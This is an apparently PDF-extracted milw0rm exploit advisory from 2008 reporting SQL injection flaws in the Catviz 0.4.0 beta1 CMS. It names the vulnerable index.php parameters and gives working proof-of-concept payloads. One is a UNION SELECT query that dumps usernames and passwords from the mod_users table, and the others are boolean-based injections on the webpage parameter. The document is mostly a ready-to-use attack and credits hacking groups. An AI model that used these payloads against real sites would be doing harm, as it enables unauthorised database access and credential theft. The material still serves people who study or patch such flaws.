Catviz 0.4.0 beta1 Multiple Remote SQL Injection Vulnerabilities.pdf

1 ###################### 2 # 3 #Catviz 0.4.0 beta1 SQL Injection Vulnerability 4 # 5 ###################### 6 # 7 #Bug by: h0yt3r 8 # 9 #Dork: n/a 10 # 11 #Homepage: catviz.sourceforge.net 12 # 13 ## 14 ### 15 ## 16 # 17 #This CMS suffers from some not correctly verified variables which are used in SQL Querys. 18 #An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys. 19 # 20 #SQL Injection: 21 #http://[target]/[path]/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=[SQL] 22 #http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL] 23 # 24 #PoC: 25 #index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6, 7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users /* 26 #index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1 27 #index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0 28 # 29 # 30 #You get "Go away you nasty intruder wannabe." when you do a wrong login... 31 # 32 # 33 ####################### 34 # 35 #Greetz to thund3r, b!zZ!t, haZl0oh, WhiTâM−^B¬ $h@Dow, $h4d0wl33t, codeblu815, ramon, Free−Hack and Sys−Flaw and h4c k−y0u. 36 # 37 # 38 ####################### 39 ####################### 40 41 # milw0rm.com [2008−06−30] Page 1/1 Catviz 0.4.0 beta1 Multiple Remote SQL Injection Vulnerabilities n/a 06/30/2008